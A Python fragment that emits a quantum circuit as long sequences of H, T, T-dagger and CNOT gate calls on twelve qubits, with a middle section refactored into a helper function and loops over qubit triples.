k.gate('cnot',[7,2])
k.gate('cnot',[1,7])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[7])
k.gate('cnot',[7,2])
k.gate('cnot',[1,7])
k.gate('cnot',[2,1])
k.gate('h',[7])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[7])
k.gate('t',[8])
k.gate('cnot',[7,3])
k.gate('cnot',[8,7])
k.gate('cnot',[3,8])
k.gate('tdag',[7])
k.gate('cnot',[3,7])
k.gate('tdag',[3])
k.gate('tdag',[7])
k.gate('t',[8])
k.gate('cnot',[8,7])
k.gate('cnot',[3,8])
k.gate('cnot',[7,3])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[4])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,4])
k.gate('cnot',[9,8])
k.gate('cnot',[4,9])
k.gate('tdag',[8])
k.gate('cnot',[4,8])
k.gate('tdag',[4])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[4,9])
k.gate('cnot',[8,4])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[5])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,5])
k.gate('cnot',[10,9])
k.gate('cnot',[5,10])
k.gate('tdag',[9])
k.gate('cnot',[5,9])
k.gate('tdag',[5])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[5,10])
k.gate('cnot',[9,5])
k.gate('h',[10])
k.gate('h',[6])
k.gate('t',[11])
k.gate('t',[10])
k.gate('t',[6])
k.gate('cnot',[10,11])
k.gate('cnot',[6,10])
k.gate('cnot',[11,6])
k.gate('tdag',[10])
k.gate('cnot',[11,10])
k.gate('tdag',[11])
k.gate('tdag',[10])
k.gate('t',[6])
k.gate('cnot',[6,10])
k.gate('cnot',[11,6])
k.gate('cnot',[10,11])
k.gate('h',[6])
k.gate('h',[10])
k.gate('t',[5])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,5])
k.gate('cnot',[10,9])
k.gate('cnot',[5,10])
k.gate('tdag',[9])
k.gate('cnot',[5,9])
k.gate('tdag',[5])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[5,10])
k.gate('cnot',[9,5])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[4])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,4])
k.gate('cnot',[9,8])
k.gate('cnot',[4,9])
k.gate('tdag',[8])
k.gate('cnot',[4,8])
k.gate('tdag',[4])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[4,9])
k.gate('cnot',[8,4])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[7])
k.gate('t',[8])
k.gate('cnot',[7,3])
k.gate('cnot',[8,7])
k.gate('cnot',[3,8])
k.gate('tdag',[7])
k.gate('cnot',[3,7])
k.gate('tdag',[3])
k.gate('tdag',[7])
k.gate('t',[8])
k.gate('cnot',[8,7])
k.gate('cnot',[3,8])
k.gate('cnot',[7,3])
k.gate('h',[8])
k.gate('h',[7])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[7])
k.gate('cnot',[2,1])
k.gate('cnot',[7,2])
k.gate('cnot',[1,7])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[7])
k.gate('cnot',[7,2])
k.gate('cnot',[1,7])
k.gate('cnot',[2,1])
k.gate('h',[7])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[7])
k.gate('t',[8])
k.gate('cnot',[7,3])
k.gate('cnot',[8,7])
k.gate('cnot',[3,8])
k.gate('tdag',[7])
k.gate('cnot',[3,7])
k.gate('tdag',[3])
k.gate('tdag',[7])
k.gate('t',[8])
k.gate('cnot',[8,7])
k.gate('cnot',[3,8])
k.gate('cnot',[7,3])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[4])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,4])
k.gate('cnot',[9,8])
k.gate('cnot',[4,9])
k.gate('tdag',[8])
k.gate('cnot',[4,8])
k.gate('tdag',[4])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[4,9])
k.gate('cnot',[8,4])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[5])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,5])
k.gate('cnot',[10,9])
k.gate('cnot',[5,10])
k.gate('tdag',[9])
k.gate('cnot',[5,9])
k.gate('tdag',[5])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[5,10])
k.gate('cnot',[9,5])
k.gate('h',[10])
k.gate('h',[5])
k.gate('t',[11])
k.gate('t',[10])
k.gate('t',[5])
k.gate('cnot',[10,11])
k.gate('cnot',[5,10])
k.gate('cnot',[11,5])
k.gate('tdag',[10])
k.gate('cnot',[11,10])
k.gate('tdag',[11])
k.gate('tdag',[10])
k.gate('t',[5])
k.gate('cnot',[5,10])
k.gate('cnot',[11,5])
k.gate('cnot',[10,11])
k.gate('h',[5])
k.gate('h',[10])
k.gate('t',[4])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,4])
k.gate('cnot',[10,9])
k.gate('cnot',[4,10])
k.gate('tdag',[9])
k.gate('cnot',[4,9])
k.gate('tdag',[4])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[4,10])
k.gate('cnot',[9,4])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[3])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,3])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('tdag',[8])
k.gate('cnot',[3,8])
k.gate('tdag',[3])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('cnot',[8,3])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[8])
k.gate('cnot',[2,1])
k.gate('cnot',[8,2])
k.gate('cnot',[1,8])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[8])
k.gate('cnot',[8,2])
k.gate('cnot',[1,8])
k.gate('cnot',[2,1])
k.gate('h',[8])
k.gate('h',[9])
k.gate('t',[3])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,3])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('tdag',[8])
k.gate('cnot',[3,8])
k.gate('tdag',[3])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('cnot',[8,3])
k.gate('h',[9])
k.gate('h',[10])
k.gate('t',[4])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,4])
k.gate('cnot',[10,9])
k.gate('cnot',[4,10])
k.gate('tdag',[9])
k.gate('cnot',[4,9])
k.gate('tdag',[4])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[4,10])
k.gate('cnot',[9,4])
k.gate('h',[10])
k.gate('h',[5])
k.gate('t',[11])
k.gate('t',[10])
k.gate('t',[5])
k.gate('cnot',[10,11])
k.gate('cnot',[5,10])
k.gate('cnot',[11,5])
k.gate('tdag',[10])
k.gate('cnot',[11,10])
k.gate('tdag',[11])
k.gate('tdag',[10])
k.gate('t',[5])
k.gate('cnot',[5,10])
k.gate('cnot',[11,5])
k.gate('cnot',[10,11])
k.gate('h',[5])
k.gate('h',[10])
k.gate('t',[4])
k.gate('t',[9])
k.gate('t',[10])
k.gate('cnot',[9,4])
k.gate('cnot',[10,9])
k.gate('cnot',[4,10])
k.gate('tdag',[9])
k.gate('cnot',[4,9])
k.gate('tdag',[4])
k.gate('tdag',[9])
k.gate('t',[10])
k.gate('cnot',[10,9])
k.gate('cnot',[4,10])
k.gate('cnot',[9,4])
k.gate('h',[10])
k.gate('h',[9])
k.gate('t',[3])
k.gate('t',[8])
k.gate('t',[9])
k.gate('cnot',[8,3])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('tdag',[8])
k.gate('cnot',[3,8])
k.gate('tdag',[3])
k.gate('tdag',[8])
k.gate('t',[9])
k.gate('cnot',[9,8])
k.gate('cnot',[3,9])
k.gate('cnot',[8,3])
k.gate('h',[9])
k.gate('h',[8])
k.gate('t',[1])
k.gate('t',[2])
k.gate('t',[8])
k.gate('cnot',[2,1])
k.gate('cnot',[8,2])
k.gate('cnot',[1,8])
k.gate('tdag',[2])
k.gate('cnot',[1,2])
k.gate('tdag',[1])
k.gate('tdag',[2])
k.gate('t',[8])
# ---------------------------------------------------------------------------
# Generated gate stream, refactored from 1886 literal k.gate(...) calls.
#
# The original emission consists of one repeating 16-gate unit applied to
# 117 different qubit triples (plus one stray CNOT and two units that are
# cut off at the chunk boundaries, kept verbatim below).  The unit is a
# 7-T-count / 6-CNOT pattern conjugated by H on the third qubit — it looks
# like a Toffoli-style decomposition, but that interpretation is an
# assumption; TODO confirm against the generator.  Gate ORDER is preserved
# exactly: each loop iteration emits the same gates, in the same order, as
# the original literal block it replaces.
# ---------------------------------------------------------------------------

# Tail of the preceding 16-gate unit (its opening gates lie before this
# chunk) — kept byte-for-byte.
k.gate('cnot',[8,2])
k.gate('cnot',[1,8])
k.gate('cnot',[2,1])
k.gate('h',[8])


def _emit_t_unit(a, b, c):
    """Emit one 16-gate unit on qubits (a, b, c).

    Pattern (exactly as produced by the original generator):
    H(c); T(a) T(b) T(c); CNOT(b,a) CNOT(c,b) CNOT(a,c); Tdag(b);
    CNOT(a,b); Tdag(a) Tdag(b) T(c); CNOT(c,b) CNOT(a,c) CNOT(b,a); H(c).
    Uses the kernel object ``k`` from the enclosing module scope.
    """
    for name, qubits in (
        ('h',    [c]),
        ('t',    [a]), ('t',    [b]), ('t',    [c]),
        ('cnot', [b, a]), ('cnot', [c, b]), ('cnot', [a, c]),
        ('tdag', [b]),
        ('cnot', [a, b]),
        ('tdag', [a]), ('tdag', [b]), ('t', [c]),
        ('cnot', [c, b]), ('cnot', [a, c]), ('cnot', [b, a]),
        ('h',    [c]),
    ):
        k.gate(name, qubits)


# Units 1-15 (originally lines preceding the lone CNOT below).
for _a, _b, _c in (
    (3, 8, 9),  (4, 9, 10),  (11, 10, 4), (3, 9, 10),  (1, 2, 9),
    (3, 9, 10), (11, 10, 4), (3, 9, 10),  (1, 2, 9),   (3, 9, 10),
    (11, 10, 3), (1, 2, 10), (11, 10, 3), (1, 2, 10),  (1, 11, 2),
):
    _emit_t_unit(_a, _b, _c)

# Single CNOT that breaks the 16-gate rhythm in the original stream.
k.gate('cnot',[11,1])

# Units 16-117.
for _a, _b, _c in (
    (4, 10, 11), (3, 9, 10),  (2, 8, 9),   (0, 1, 8),   (2, 8, 9),
    (3, 9, 10),  (4, 10, 11), (3, 9, 10),  (2, 8, 9),   (0, 1, 8),
    (2, 8, 9),   (3, 9, 10),  (11, 4, 9),  (10, 3, 4),  (8, 2, 3),
    (7, 1, 2),   (5, 6, 1),   (7, 1, 2),   (8, 2, 3),   (10, 3, 4),
    (11, 4, 9),  (10, 3, 4),  (8, 2, 3),   (7, 1, 2),   (5, 6, 1),
    (7, 1, 2),   (8, 2, 3),   (10, 3, 4),  (4, 10, 11), (3, 9, 10),
    (2, 8, 9),   (0, 1, 8),   (2, 8, 9),   (3, 9, 10),  (4, 10, 11),
    (3, 9, 10),  (2, 8, 9),   (0, 1, 8),   (2, 8, 9),   (3, 9, 10),
    (11, 4, 9),  (10, 3, 4),  (8, 2, 3),   (7, 1, 2),   (5, 6, 1),
    (7, 1, 2),   (8, 2, 3),   (10, 3, 4),  (11, 4, 9),  (10, 3, 4),
    (8, 2, 3),   (7, 1, 2),   (5, 6, 1),   (7, 1, 2),   (8, 2, 3),
    (10, 3, 4),  (3, 11, 9),  (2, 10, 11), (0, 1, 10),  (2, 10, 11),
    (3, 11, 9),  (2, 10, 11), (0, 1, 10),  (2, 10, 11), (9, 11, 8),
    (10, 3, 11), (7, 2, 3),   (6, 1, 2),   (4, 5, 1),   (6, 1, 2),
    (7, 2, 3),   (10, 3, 11), (9, 11, 8),  (10, 3, 11), (7, 2, 3),
    (6, 1, 2),   (4, 5, 1),   (6, 1, 2),   (7, 2, 3),   (10, 3, 11),
    (3, 11, 9),  (2, 10, 11), (0, 1, 10),  (2, 10, 11), (3, 11, 9),
    (2, 10, 11), (0, 1, 10),  (2, 10, 11), (9, 11, 8),  (10, 3, 11),
    (7, 2, 3),   (6, 1, 2),   (4, 5, 1),   (6, 1, 2),   (7, 2, 3),
    (10, 3, 11), (9, 11, 8),  (10, 3, 11), (7, 2, 3),   (6, 1, 2),
    (4, 5, 1),   (6, 1, 2),
):
    _emit_t_unit(_a, _b, _c)

# Head of the next 16-gate unit on (7, 2, 3) — its remaining gates lie
# past the end of this chunk; kept byte-for-byte.
k.gate('h',[3])
k.gate('t',[7])
k.gate('t',[2])
k.gate('t',[3])
k.gate('cnot',[2,7])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('tdag',[2])
k.gate('cnot',[7,2])
k.gate('tdag',[7])
k.gate('tdag',[2])
k.gate('t',[3])
k.gate('cnot',[3,2])
k.gate('cnot',[7,3])
k.gate('cnot',[2,7])
k.gate('h',[3])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[3])
k.gate('t',[11])
k.gate('cnot',[3,10])
k.gate('cnot',[11,3])
k.gate('cnot',[10,11])
k.gate('tdag',[3])
k.gate('cnot',[10,3])
k.gate('tdag',[10])
k.gate('tdag',[3])
k.gate('t',[11])
k.gate('cnot',[11,3])
k.gate('cnot',[10,11])
k.gate('cnot',[3,10])
k.gate('h',[11])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[11])
k.gate('t',[8])
k.gate('cnot',[11,3])
k.gate('cnot',[8,11])
k.gate('cnot',[3,8])
k.gate('tdag',[11])
k.gate('cnot',[3,11])
k.gate('tdag',[3])
k.gate('tdag',[11])
k.gate('t',[8])
k.gate('cnot',[8,11])
k.gate('cnot',[3,8])
k.gate('cnot',[11,3])
k.gate('h',[8])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[10])
k.gate('cnot',[1,0])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[10])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('cnot',[1,0])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[11])
k.gate('t',[8])
k.gate('cnot',[11,3])
k.gate('cnot',[8,11])
k.gate('cnot',[3,8])
k.gate('tdag',[11])
k.gate('cnot',[3,11])
k.gate('tdag',[3])
k.gate('tdag',[11])
k.gate('t',[8])
k.gate('cnot',[8,11])
k.gate('cnot',[3,8])
k.gate('cnot',[11,3])
k.gate('h',[8])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[10])
k.gate('cnot',[1,0])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[10])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('cnot',[1,0])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[7])
k.gate('t',[8])
k.gate('t',[11])
k.gate('t',[7])
k.gate('cnot',[11,8])
k.gate('cnot',[7,11])
k.gate('cnot',[8,7])
k.gate('tdag',[11])
k.gate('cnot',[8,11])
k.gate('tdag',[8])
k.gate('tdag',[11])
k.gate('t',[7])
k.gate('cnot',[7,11])
k.gate('cnot',[8,7])
k.gate('cnot',[11,8])
k.gate('h',[7])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[3])
k.gate('t',[9])
k.gate('cnot',[3,6])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('tdag',[3])
k.gate('cnot',[6,3])
k.gate('tdag',[6])
k.gate('tdag',[3])
k.gate('t',[9])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('cnot',[3,6])
k.gate('h',[9])
k.gate('h',[3])
k.gate('t',[4])
k.gate('t',[5])
k.gate('t',[3])
k.gate('cnot',[5,4])
k.gate('cnot',[3,5])
k.gate('cnot',[4,3])
k.gate('tdag',[5])
k.gate('cnot',[4,5])
k.gate('tdag',[4])
k.gate('tdag',[5])
k.gate('t',[3])
k.gate('cnot',[3,5])
k.gate('cnot',[4,3])
k.gate('cnot',[5,4])
k.gate('h',[3])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[3])
k.gate('t',[9])
k.gate('cnot',[3,6])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('tdag',[3])
k.gate('cnot',[6,3])
k.gate('tdag',[6])
k.gate('tdag',[3])
k.gate('t',[9])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('cnot',[3,6])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[7])
k.gate('t',[8])
k.gate('t',[11])
k.gate('t',[7])
k.gate('cnot',[11,8])
k.gate('cnot',[7,11])
k.gate('cnot',[8,7])
k.gate('tdag',[11])
k.gate('cnot',[8,11])
k.gate('tdag',[8])
k.gate('tdag',[11])
k.gate('t',[7])
k.gate('cnot',[7,11])
k.gate('cnot',[8,7])
k.gate('cnot',[11,8])
k.gate('h',[7])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[3])
k.gate('t',[9])
k.gate('cnot',[3,6])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('tdag',[3])
k.gate('cnot',[6,3])
k.gate('tdag',[6])
k.gate('tdag',[3])
k.gate('t',[9])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('cnot',[3,6])
k.gate('h',[9])
k.gate('h',[3])
k.gate('t',[4])
k.gate('t',[5])
k.gate('t',[3])
k.gate('cnot',[5,4])
k.gate('cnot',[3,5])
k.gate('cnot',[4,3])
k.gate('tdag',[5])
k.gate('cnot',[4,5])
k.gate('tdag',[4])
k.gate('tdag',[5])
k.gate('t',[3])
k.gate('cnot',[3,5])
k.gate('cnot',[4,3])
k.gate('cnot',[5,4])
k.gate('h',[3])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[3])
k.gate('t',[9])
k.gate('cnot',[3,6])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('tdag',[3])
k.gate('cnot',[6,3])
k.gate('tdag',[6])
k.gate('tdag',[3])
k.gate('t',[9])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('cnot',[3,6])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[11])
k.gate('t',[8])
k.gate('cnot',[11,3])
k.gate('cnot',[8,11])
k.gate('cnot',[3,8])
k.gate('tdag',[11])
k.gate('cnot',[3,11])
k.gate('tdag',[3])
k.gate('tdag',[11])
k.gate('t',[8])
k.gate('cnot',[8,11])
k.gate('cnot',[3,8])
k.gate('cnot',[11,3])
k.gate('h',[8])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[10])
k.gate('cnot',[1,0])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[10])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('cnot',[1,0])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[8])
k.gate('t',[3])
k.gate('t',[11])
k.gate('t',[8])
k.gate('cnot',[11,3])
k.gate('cnot',[8,11])
k.gate('cnot',[3,8])
k.gate('tdag',[11])
k.gate('cnot',[3,11])
k.gate('tdag',[3])
k.gate('tdag',[11])
k.gate('t',[8])
k.gate('cnot',[8,11])
k.gate('cnot',[3,8])
k.gate('cnot',[11,3])
k.gate('h',[8])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[10])
k.gate('t',[0])
k.gate('t',[1])
k.gate('t',[10])
k.gate('cnot',[1,0])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('tdag',[1])
k.gate('cnot',[0,1])
k.gate('tdag',[0])
k.gate('tdag',[1])
k.gate('t',[10])
k.gate('cnot',[10,1])
k.gate('cnot',[0,10])
k.gate('cnot',[1,0])
k.gate('h',[10])
k.gate('h',[11])
k.gate('t',[2])
k.gate('t',[10])
k.gate('t',[11])
k.gate('cnot',[10,2])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('tdag',[10])
k.gate('cnot',[2,10])
k.gate('tdag',[2])
k.gate('tdag',[10])
k.gate('t',[11])
k.gate('cnot',[11,10])
k.gate('cnot',[2,11])
k.gate('cnot',[10,2])
k.gate('h',[11])
k.gate('h',[7])
k.gate('t',[8])
k.gate('t',[11])
k.gate('t',[7])
k.gate('cnot',[11,8])
k.gate('cnot',[7,11])
k.gate('cnot',[8,7])
k.gate('tdag',[11])
k.gate('cnot',[8,11])
k.gate('tdag',[8])
k.gate('tdag',[11])
k.gate('t',[7])
k.gate('cnot',[7,11])
k.gate('cnot',[8,7])
k.gate('cnot',[11,8])
k.gate('h',[7])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[3])
k.gate('t',[9])
k.gate('cnot',[3,6])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('tdag',[3])
k.gate('cnot',[6,3])
k.gate('tdag',[6])
k.gate('tdag',[3])
k.gate('t',[9])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('cnot',[3,6])
k.gate('h',[9])
k.gate('h',[3])
k.gate('t',[4])
k.gate('t',[5])
k.gate('t',[3])
k.gate('cnot',[5,4])
k.gate('cnot',[3,5])
k.gate('cnot',[4,3])
k.gate('tdag',[5])
k.gate('cnot',[4,5])
k.gate('tdag',[4])
k.gate('tdag',[5])
k.gate('t',[3])
k.gate('cnot',[3,5])
k.gate('cnot',[4,3])
k.gate('cnot',[5,4])
k.gate('h',[3])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[3])
k.gate('t',[9])
k.gate('cnot',[3,6])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('tdag',[3])
k.gate('cnot',[6,3])
k.gate('tdag',[6])
k.gate('tdag',[3])
k.gate('t',[9])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('cnot',[3,6])
k.gate('h',[9])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[7])
k.gate('t',[8])
k.gate('t',[11])
k.gate('t',[7])
k.gate('cnot',[11,8])
k.gate('cnot',[7,11])
k.gate('cnot',[8,7])
k.gate('tdag',[11])
k.gate('cnot',[8,11])
k.gate('tdag',[8])
k.gate('tdag',[11])
k.gate('t',[7])
k.gate('cnot',[7,11])
k.gate('cnot',[8,7])
k.gate('cnot',[11,8])
k.gate('h',[7])
k.gate('h',[11])
k.gate('t',[10])
k.gate('t',[9])
k.gate('t',[11])
k.gate('cnot',[9,10])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('tdag',[9])
k.gate('cnot',[10,9])
k.gate('tdag',[10])
k.gate('tdag',[9])
k.gate('t',[11])
k.gate('cnot',[11,9])
k.gate('cnot',[10,11])
k.gate('cnot',[9,10])
k.gate('h',[11])
k.gate('h',[9])
k.gate('t',[6])
k.gate('t',[3])
k.gate('t',[9])
k.gate('cnot',[3,6])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('tdag',[3])
k.gate('cnot',[6,3])
k.gate('tdag',[6])
k.gate('tdag',[3])
k.gate('t',[9])
k.gate('cnot',[9,3])
k.gate('cnot',[6,9])
k.gate('cnot',[3,6])
k.gate('h',[9])
k.gate('h',[3])
k.gate('t',[4])
k.gate('t',[5])
k.gate('t',[3])
k.gate('cnot',[5,4])
k.gate('cnot',[3,5])
k.gate('cnot',[4,3])
k.gate('tdag',[5])
k.gate('cnot',[4,5])
k.gate('tdag',[4])
k.gate('tdag',[5])
k.gate('t',[3])
